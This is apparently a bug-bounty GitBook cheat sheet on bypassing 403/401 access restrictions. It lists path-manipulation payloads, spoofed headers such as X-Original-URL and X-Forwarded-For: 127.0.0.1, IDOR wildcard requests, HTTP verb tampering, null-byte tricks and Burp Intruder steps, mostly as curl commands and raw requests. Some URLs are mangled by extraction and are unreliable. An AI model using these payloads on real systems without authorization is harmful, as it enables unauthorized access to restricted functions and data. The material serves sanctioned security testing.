Bypass 403 / 401
Various bypass tricks and tools
/admin -> 403 or 302
/Admin
/AdMin
/admin/
/admin/.
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin
X-Originial-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admincurl -i https:%2F%http://2Ftarget.com/admin -H "X-Original-URL: /admin"
curl -i https3A%2F%http://2Ftarget.com/admin -X POST -H "X-Custom-IP-Authorization: 127.0.0.1"
Capitalize the path
Request to /ADMIN/DELETEUSER may still be mapped to the /admin/deleteUser
curl https://example.com/AdMiNAdd Suffix
curl https://example.com/admin.jsonPUT /my_day/jobs/4 HTTP/2 = 403
PUT /my_day/jobs/4.json HTTP/2 = 200 OKURL encoding
# Try %2e%2e%2f (../) or %20 (space)
curl -g --path-as-is "https://example.com/%2e%2e/admin"Spring framework
If Spring framework have enabled the useSuffixPatternMatch option, a request to /admin/deleteUser.anything would still match the /admin/deleteUser pattern.
Prior to Spring 5.3, this option is enabled by default.
API - IDOR
IDOR/api/67898555007/users -> 403
/api//users
/api\\users
/api/v1/user/id -> 403
/api/vl/user/id.json
/api/vl/user/id?
/api/vl/user/id/
/api/v2/user/id
/api/vl/user/id&accountdetail
/api/v1/user/yourid&victimid
X-Original-Url: /api/v1/user/idSend a wildcard (*, %, ., _) instead of an ID, some backend might respond with the data of all the users.
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1Git
If a path with .git/ = 403, then /.git/config might be 200!
Wordpress
X-Rewrite-Url Header can be used to bypass WordPress 403 pages.
POST /xmlrpc HTTP/1.1
Host: https://blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.phpBurp Extensions - 403 Bypasser
HTTP Verb Tampering
HTTP Verb TamperingChange request method from GET to TRACE, etc.
curl -X TRACE https://example.com/admin --path-as-is
GET /admin HTTP/1.1
Host: target.comChange method like this way:
POST /admin HTTP/1.1
Host: target.comIf the application supports method override header then you can also test like this way:
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET
Or
X-http-override: GETFuzz
ยท /FUZZ/admin
ยท /admin/FUZZ
ยท /adminFUZZPayload List
Set Up Burp Suite Intruder:
Open Burp Suite and navigate to the Intruder tab.
Send your request to Intruder by right-clicking on it in the Proxy tab and selecting Send to Intruder.
Configure the Intruder positions by selecting the directory or path you want to bypass.
Load the Payloads:
Copy the payloads from the provided wordlist.
Paste the payloads into the Payload Options input field in the Intruder tab.
Payload Processing:
Below the Payload Options section, locate the Payload Processing tool.
Click the Add button to open a new window.
Select the rule Replace String.
Replace the placeholder
{base}with the base value you want to use for bypassing.
Disable URL Encoding:
Uncheck the option URL-encode these characters to ensure the payloads are not altered.
Start the Attack:
Click Start Attack and observe the results.
Look for requests that return a 200 status code, indicating a successful bypass.
Content-Length:0
curl -X POST -H โContent-Length:0โ https://www.redacted.com403 Header Bypass
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/admin
curl -H "Referer: https://example.com" https://example.com/restricted
curl -H "X-Original-URL: /admin" https://example.com/404
curl -H "X-Rewrite-URL: /admin" https://example.com/404
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /adminBase-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1Parameter Tampering
curl "https://example.com/admin?unused_param=1"
curl "https://example.com/admin?redirect=allowed"Secret Trick: Override parameters with conflicting values:
curl "https://example.com/admin?admin=false&admin=true"Null Byte Injection
curl --path-as-is "https://example.com/admin.php%00.html"HTTP Version Downgrade
curl --http1.0 https://example.com/adminBypass Origin
Tools
Go-recon - gr-403:
# byp4xx $TARGETResources
Interesting Books
Interesting BooksThe Web Application Hackerโs Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated